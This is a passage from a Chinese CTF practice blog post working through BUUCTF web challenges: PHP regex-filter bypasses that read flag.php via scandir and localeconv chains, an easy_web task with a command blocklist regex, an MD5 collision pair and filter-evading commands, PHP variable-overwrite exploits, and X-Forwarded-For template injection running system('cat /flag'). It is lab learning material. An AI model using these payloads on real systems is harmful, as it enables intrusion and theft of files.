<p>可以看出一共有三层过滤，我们一层一层来分析</p>
<ol>
<li><p>第一层</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">'/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i'</span>, $_GET[<span class="string">'exp'</span>]))</span><br></pre></td></tr></table></figure>

<p>这句过滤了大部分伪协议读取，<code>data://|filter://|php://|phar://</code></p>
</li>
<li><p>第二层</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="string">';'</span> === preg_replace(<span class="string">'/[a-z,_]+\((?R)?\)/'</span>, <span class="keyword">NULL</span>, $_GET[<span class="string">'exp'</span>]))</span><br></pre></td></tr></table></figure>

<p>这句一开始真没看懂，查了大佬的wp才看懂。</p>
<p><code>(?R)</code>代表引用当前表达式，那这句估计就是题目标题的意思了：套娃。</p>
<p>这句整个就代表<strong>一个字母与下划线组成的字符串</strong>加一个<strong>括号</strong>，括号里面没有东西或者继续引用本语句，也就是类似于</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx(aaa(bb()));			&#x2F;&#x2F;bb()里必须是空的</span><br></pre></td></tr></table></figure>
</li>
<li><p>第三层</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (!preg_match(<span class="string">'/et|na|info|dec|bin|hex|oct|pi|log/i'</span>, $_GET[<span class="string">'exp'</span>]))</span><br></pre></td></tr></table></figure>

<p>过滤了一些字符串，也就相当于过滤了一些函数，例如<code>file_get_content()</code>,<code>hex()</code>。</p>
</li>
</ol>
<p>首先我们是需要读取flag.php，虽然file_get_content被过滤了，但还是有许多函数可以使用，例如<code>readfile()</code>,<code>highlight_file()</code>,<code>show_source()</code>。</p>
<p>接着我们要解决不能输入flag.php参数问题，我们想到scandir(.)里面会有flag.php，但是.也是参数啊。</p>
<p>这时就有一个很骚的操作了</p>
<blockquote>
<p>localeconv函数:返回一包含本地数字及货币格式信息的数组。</p>
<p>很巧的是，这个数组第一位就是.</p>
<p>current() 返回数组中的当前单元, 默认取第一个值。</p>
<p>我们结合利用：</p>
<p>current(localeconv())返回值就是.</p>
</blockquote>
<p>于是<code>?exp=print_r(scandir(current(localeconv())))</code>得到</p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/4-2.png" alt="4-2"></p>
<p>下面的问题就是如何读取这个flag.php</p>
<p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/4-3.png" alt="4-3"></p>
<ol>
<li><p>方法一：利用array_reverse()将数组倒序，然后next()读取第二个</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp&#x3D;print_r(readfile(next(array_reverse(scandir(current(localeconv()))))));</span><br></pre></td></tr></table></figure>
</li>
<li><p>方法二：array_flip()交换数组的键和值，然后array_rand()随机读取数组的键</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp&#x3D;print_r(highlight_file(array_rand(array_flip(scandir(current(localeconv()))))));</span><br></pre></td></tr></table></figure>
</li>
<li><p>方法三：利用sessionid</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp&#x3D;print_r(show_source(session_id(session_start())))</span><br></pre></td></tr></table></figure>

<p>使用这个exp后，要利用bp抓包，然后加上cookie<img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/4-4.png" alt="4-4"></p>
</li>
</ol>
<h1 id="安洵杯-2019-easy-web"><a href="#安洵杯-2019-easy-web" class="headerlink" title="[安洵杯 2019]easy_web"></a>[安洵杯 2019]easy_web</h1><p>进去观察网址栏</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;5163acd7-7850-4f24-a2b4-cef0277781e7.node3.buuoj.cn&#x2F;index.php?img&#x3D;TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd&#x3D;</span><br></pre></td></tr></table></figure>

<p>发现<code>TXpVek5UTTFNbVUzTURabE5qYz0</code>很显眼，经过两次base64解密和一次十六进制解密后，得到<code>555.png</code>，猜想img=表示获取后面的内容，于是我们对index.php进行反向加密，输入后得到源码:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(E_ALL || ~ E_NOTICE);</span><br><span class="line">header(<span class="string">'content-type:text/html;charset=utf-8'</span>);</span><br><span class="line">$cmd = $_GET[<span class="string">'cmd'</span>];</span><br><span class="line"><span class="keyword">if</span> (!<span class="keyword">isset</span>($_GET[<span class="string">'img'</span>]) || !<span class="keyword">isset</span>($_GET[<span class="string">'cmd'</span>])) </span><br><span class="line">    header(<span class="string">'Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&amp;cmd='</span>);</span><br><span class="line">$file = hex2bin(base64_decode(base64_decode($_GET[<span class="string">'img'</span>])));   <span class="comment">//把十六进制转为ASCII字符</span></span><br><span class="line"></span><br><span class="line">$file = preg_replace(<span class="string">"/[^a-zA-Z0-9.]+/"</span>, <span class="string">""</span>, $file);</span><br><span class="line"><span class="keyword">if</span> (preg_match(<span class="string">"/flag/i"</span>, $file)) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;img src ="./ctf3.jpeg"&gt;'</span>;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">"xixi～ no flag"</span>);</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    $txt = base64_encode(file_get_contents($file));</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;img src='data:image/gif;base64,"</span> . $txt . <span class="string">"'&gt;&lt;/img&gt;"</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">echo</span> $cmd;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">if</span> (preg_match(<span class="string">"/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\&#123;|\&#125;|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|&#123;|&#125;|\(|\)|-|&lt;|&gt;/i"</span>, $cmd)) &#123;</span><br><span class="line">    <span class="keyword">echo</span>(<span class="string">"forbid ~"</span>);</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="keyword">if</span> ((string)$_POST[<span class="string">'a'</span>] !== (string)$_POST[<span class="string">'b'</span>] &amp;&amp; md5($_POST[<span class="string">'a'</span>]) === md5($_POST[<span class="string">'b'</span>])) &#123;</span><br><span class="line">        <span class="keyword">echo</span> `$cmd`;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> (<span class="string">"md5 is funny ~"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>这里的重点有两个：</p>
<p><strong>第一个是：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (preg_match(<span class="string">"/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\&#123;|\&#125;|\(|\)|\&amp;[^\d]|@|\||\\$|\[|\]|&#123;|&#125;|\(|\)|-|&lt;|&gt;/i"</span>, $cmd)) &#123;</span><br><span class="line">    <span class="keyword">echo</span>(<span class="string">"forbid ~"</span>);php</span><br></pre></td></tr></table></figure>

<p>对于$cmd过滤了许多重要命令，比如cat</p>
<p><strong>第二个是：</strong></p>
<p>需要有一个md5的强类型比较</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if ((string)$_POST[&#39;a&#39;] !&#x3D;&#x3D; (string)$_POST[&#39;b&#39;] &amp;&amp; md5($_POST[&#39;a&#39;]) &#x3D;&#x3D;&#x3D; md5($_POST[&#39;b&#39;])) &#123;</span><br><span class="line">        echo &#96;$cmd&#96;;</span><br></pre></td></tr></table></figure>

<p>对于这一点，网上有现成的绕过方法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">a&#x3D;%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2</span><br><span class="line">&amp;b&#x3D;%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2</span><br></pre></td></tr></table></figure>

<p><strong>注意复制这个值到bp的时候，有时bp会自动把%转成%25，导致错误。</strong></p>
<p>而对于第一点，有两种方法：</p>
<p><strong>第一种：</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ca\t%20&#x2F;flag</span><br></pre></td></tr></table></figure>

<p>看似原题中过滤了cat和\，但在这里<code>\t</code>被当成TAB而没有被过滤，就可以读取到flag。</p>
<p><strong>第二种：</strong></p>
<blockquote>
<p>Linux sort命令用于将文本文件内容加以排序。</p>
<p>sort可针对文本文件的内容，以行为单位来排序。</p>
</blockquote>
<p>我们可以利用sort命令</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sort%20&#x2F;flag</span><br></pre></td></tr></table></figure>







<h1 id="BUUCTF-BJDCTF2020-Mark-loves-cat【php变量覆盖】"><a href="#BUUCTF-BJDCTF2020-Mark-loves-cat【php变量覆盖】" class="headerlink" title="BUUCTF [BJDCTF2020]Mark loves cat【php变量覆盖】"></a>BUUCTF [BJDCTF2020]Mark loves cat【php变量覆盖】</h1><p>先是扫一下目录，发现是git泄露，然后githack扫一下【我的似乎有点问题，咋都扫不出来】，直接白嫖了别人扫出来的：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span><span class="string">'flag.php'</span>;</span><br><span class="line">$yds = <span class="string">"dog"</span>;</span><br><span class="line">$is = <span class="string">"cat"</span>;</span><br><span class="line">$handsome = <span class="string">'yds'</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>($_POST <span class="keyword">as</span> $x =&gt; $y)&#123;</span><br><span class="line">    $$x = $y;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>($_GET <span class="keyword">as</span> $x =&gt; $y)&#123; </span><br><span class="line">    $$x = $$y;  </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span>($_GET <span class="keyword">as</span> $x =&gt; $y)&#123; </span><br><span class="line">    <span class="keyword">if</span>($_GET[<span class="string">'flag'</span>] === $x &amp;&amp; $x !== <span class="string">'flag'</span>)&#123; <span class="comment">//判断get传进来的值等不等于flag 如果等于flag则跳过</span></span><br><span class="line">        <span class="keyword">exit</span>($handsome);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>($_GET[<span class="string">'flag'</span>]) &amp;&amp; !<span class="keyword">isset</span>($_POST[<span class="string">'flag'</span>]))&#123;</span><br><span class="line">    <span class="keyword">exit</span>($yds);</span><br><span class="line">    </span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>($_POST[<span class="string">'flag'</span>] === <span class="string">'flag'</span>  || $_GET[<span class="string">'flag'</span>] === <span class="string">'flag'</span>)&#123;</span><br><span class="line">    <span class="keyword">exit</span>($is);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> <span class="string">"the flag is: "</span>.$flag;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>如果想打印flag，有两种方法，一种是将exit()里面的变量变成$flag【$yds=$flag】；还有一种就是之前一直不改变$flag的值，同时绕过三个if，最后输出flag。</p>
<p>对三个if语句分析一下，发现在最后输出flag是不可能的。</p>
<p>有三个exit，那么就有理论上就有三种方法。</p>
<ol>
<li>$handsome=$flag：要求GET传flag参数，由<code>$$x = $$y</code>知只可传flag=flag才不会改变flag的值，可这样却又无法通过if绕过，故不可。</li>
<li>$yds：?yds=flag可通过第二个if并且输出flag</li>
<li>$is：?flag=flag&amp;is=flag可通过第三个if并且输出is</li>
</ol>
<h2 id="变量覆盖四种情况"><a href="#变量覆盖四种情况" class="headerlink" title="变量覆盖四种情况"></a>变量覆盖四种情况</h2><h3 id="第一种：如上题所示，出现类似于-x-y的语句"><a href="#第一种：如上题所示，出现类似于-x-y的语句" class="headerlink" title="第一种：如上题所示，出现类似于$$x = $$y的语句"></a>第一种：如上题所示，出现类似于<code>$$x = $$y</code>的语句</h3><h3 id="第二种：extract-函数使用不当【extract参数未设置】"><a href="#第二种：extract-函数使用不当【extract参数未设置】" class="headerlink" title="第二种：extract()函数使用不当【extract参数未设置】"></a>第二种：extract()函数使用不当【extract参数未设置】</h3><p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/5-1.png" alt="5-1"></p>
<p>可以看到，如果第二个变量没有取好或者没有设置第二个参数就会存在变量覆盖。</p>
<p>例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a &#x3D; 1;    &#x2F;&#x2F;原变量值为1</span><br><span class="line">$b &#x3D; array(&#39;a&#39; &#x3D;&gt; &#39;3&#39;);</span><br><span class="line">extract($b);    &#x2F;&#x2F;经过extract()函数对$b处理后</span><br><span class="line">echo $a;    &#x2F;&#x2F;输出结果为3</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>例题：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&quot;extract($_GET);</span><br><span class="line">if(isset($bdctf))</span><br><span class="line">&#123;</span><br><span class="line">$content&#x3D;trim(file_get_contents($flag));&#x2F;&#x2F;file_get_contents—将整个文件读入一个字符串</span><br><span class="line">if($bdctf&#x3D;&#x3D;$content)                             &#x2F;&#x2F;trim—去除字符串首尾处的空白字符（或者其他字符）</span><br><span class="line">&#123; echo&#39;bdctf&#123;**********&#125;&#39;; &#125;</span><br><span class="line">else</span><br><span class="line">&#123; echo&#39;这不是蓝盾的密码啊&#39;; &#125;</span><br><span class="line">&#125;&quot;</span><br></pre></td></tr></table></figure>

<p>为了达到$bdctf==$content，我们可以使两个值都为空：</p>
<p><code>?bdctd=&amp;flag=</code> </p>
<h3 id="第三种：parse-str-函数使用不当【magic-quotes-gpc未开启】"><a href="#第三种：parse-str-函数使用不当【magic-quotes-gpc未开启】" class="headerlink" title="第三种：parse_str()函数使用不当【magic_quotes_gpc未开启】"></a>第三种：parse_str()函数使用不当【magic_quotes_gpc未开启】</h3><p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/5-2.png" alt="5-2"></p>
<p>例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$a &#x3D; 1;                  &#x2F;&#x2F;原变量值为1</span><br><span class="line">parse_str(&#39;a&#x3D;2&#39;);   &#x2F;&#x2F;经过parse_str()函数后注册变量$a，重新赋值</span><br><span class="line">print_r($a);          &#x2F;&#x2F;输出结果为2</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>例题：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="keyword">if</span>(</span><br><span class="line"><span class="keyword">empty</span>($_GET[<span class="string">'id'</span>])) &#123;                    <span class="comment">//empty()检查是否为空</span></span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);            <span class="comment">//highlight_file—语法高亮一个文件</span></span><br><span class="line"><span class="keyword">die</span>();                                          <span class="comment">//等同于exit—输出一个消息并且退出当前脚本</span></span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="keyword">include</span> (‘flag.php’);</span><br><span class="line">$a = “www.OPENCTF.com”;</span><br><span class="line">$id = $_GET[<span class="string">'id'</span>];</span><br><span class="line">@parse_str($id);</span><br><span class="line"><span class="keyword">if</span> ($a[<span class="number">0</span>] != ‘QNKCDZO’ &amp;&amp; md5($a[<span class="number">0</span>]) == md5(‘QNKCDZO’)) &#123;</span><br><span class="line"><span class="keyword">echo</span> $flag;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line"><span class="keyword">exit</span>(‘其实很简单其实并不难！’);</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>md5(‘QNKCDZO’)得到0e830400451993494058024219903391，由于==弱比较，只要找到一个md5加密后以0e开头的就OK了。</p>
<p><code>?id=a[0]=s878926199a</code></p>
<h3 id="第四种情况：import-request-variables-使用不当【register-globals被禁止】"><a href="#第四种情况：import-request-variables-使用不当【register-globals被禁止】" class="headerlink" title="第四种情况：import_request_variables()使用不当【register_globals被禁止】"></a>第四种情况：import_request_variables()使用不当【register_globals被禁止】</h3><p><img src="/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/5-3.png" alt="5-3"></p>
<p>例子：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $auth=<span class="string">'0'</span>;</span><br><span class="line">    import_request_variables(<span class="string">'G'</span>);</span><br><span class="line">    <span class="keyword">if</span>($auth== <span class="number">1</span>)&#123;</span><br><span class="line">    <span class="keyword">echo</span><span class="string">"private!"</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span><span class="string">"public!"</span>;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>?auth=1</code>时，输出private</p>
<h2 id="BJDCTF2020-The-mystery-of-ip"><a href="#BJDCTF2020-The-mystery-of-ip" class="headerlink" title="[BJDCTF2020]The mystery of ip"></a>[BJDCTF2020]The mystery of ip</h2><p>这题唯一的知识点就是：</p>
<p><code>X-FORWARDED-FOR</code>，<code>client-ip</code></p>
<p>可以伪造ip，在flag.php抓个包，加个字段就OK了</p>
<p>然后加大括号发现里面可以进行运算</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">X-FORWARDED-FOR：&#123;1+2&#125;			&#x2F;&#x2F;3</span><br><span class="line">X-FORWARDED-FOR：&#123;system(&#39;ls&#39;)&#125;   &#x2F;&#x2F;成功</span><br><span class="line">X-FORWARDED-FOR：&#123;system(&#39;cat &#x2F;flag&#39;)&#125;</span><br></pre></td></tr></table></figure>

</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">George</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://yoursite.com/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/">http://yoursite.com/2020/08/02/buuctf%E5%88%B7%E9%A2%98%E8%AE%B0%E5%BD%95/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="noopener">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/BUU/">BUU</a></div><div class="addthis_inline_share_toolbox pull-right"></div><script src="//s7.addthis.com/js/300/addthis_widget.js#pubid=undefined" async></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/08/08/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/"><i class="fa fa-chevron-left">  </i><span>文件上传</span></a></div><div class="next-post pull-right"><a href="/2020/07/29/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/"><span>php伪协议</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://Albatross-G.github.io/img/a1.png)"><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2020 By George</div><div class="framework-info"><span>Driven - </span><a href="http://hexo.io" target="_blank" rel="noopener"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a href="https://github.com/Molunerfinn/hexo-theme-melody" target="_blank" rel="noopener"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.6.1"></script><script src="/js/fancybox.js?version=1.6.1"></script><script src="/js/sidebar.js?version=1.6.1"></script><script src="/js/copy.js?version=1.6.1"></script><script src="/js/fireworks.js?version=1.6.1"></script><script src="/js/transition.js?version=1.6.1"></script><script src="/js/scroll.js?version=1.6.1"></script><script src="/js/head.js?version=1.6.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">Local search</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="Search for Posts"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>Powered by</span> <a href="https://github.com/wzpan/hexo-generator-search" target="_blank" rel="noopener" style="color:#49B1F5;">hexo-generator-search</a></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/hijiki.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body></html>